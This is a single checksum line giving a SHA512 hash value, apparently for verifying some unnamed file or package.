SHA512c3de254803a46ac3dc0cf93e0546ce4825a317739af94af32ee87723170f24be0853f8e7fd823e3e5e19f12670357c89f64841da58854dc631310700590eefd6